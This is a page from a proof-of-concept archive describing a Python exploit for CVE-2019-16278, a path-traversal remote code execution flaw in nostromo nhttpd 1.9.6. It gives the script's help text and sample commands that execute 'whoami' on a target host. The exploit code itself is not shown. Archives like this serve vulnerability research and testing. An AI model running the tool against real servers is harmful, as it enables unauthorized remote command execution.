Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-16278 PoC — nostromo nhttpd 路径遍历漏洞

Source
https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE
Associated Vulnerability
Title:nostromo nhttpd 路径遍历漏洞 (CVE-2019-16278)
Description:Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
Description
Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.
Readme
# CVE-2019-16278 - Nostromo 1.9.6 RCE
Python script to exploit RCE in Nostromo nhttpd &lt;= 1.9.6.


## Help
```
usage: CVE-2019-16278.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES]

Exploit for CVE-2019-16278 - Nostromo 1.9.6 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Remote host to target
  -p PORT, --port PORT  Remote port to target
  -c COMMAND, --command COMMAND
                        Command to execute on the server
  -b BYTES, --bytes BYTES
                        The number of bytes to receive back in the response
```

## Usage

Run the exploit

```bash
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami
```

Run the exploit and recieve more bytes in the response

```bash
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami -b 4096
```
File Snapshot

 [4.0K]  /data/pocs/5504050db6a1f89b3f124fd8c747155acd3d26fd
├── [1.1K]  CVE-2019-16278.py
└── [ 863]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →